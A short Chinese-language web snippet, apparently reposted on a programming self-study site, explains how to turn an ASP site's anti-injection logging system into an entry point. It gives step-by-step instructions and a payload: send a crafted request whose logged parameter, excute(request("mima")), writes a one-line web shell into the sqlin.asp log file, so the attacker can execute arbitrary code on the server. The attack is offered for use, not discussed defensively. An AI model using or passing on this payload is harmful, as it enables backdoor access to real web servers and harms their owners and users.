例如:
网址: http://www.2cto.com /newslist.asp?id=122′ 提示[你的操作已被记录!]等信息。 利用方法: www.2cto.com /sqlin.asp 看是否存在,存在提交 http://www.2cto.com /newslist. asp ?id=122‘excute(request("mima"))写入一句话。
查看更多关于提交’时提示ip被记录 防注入系统的利用 - 网站的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11654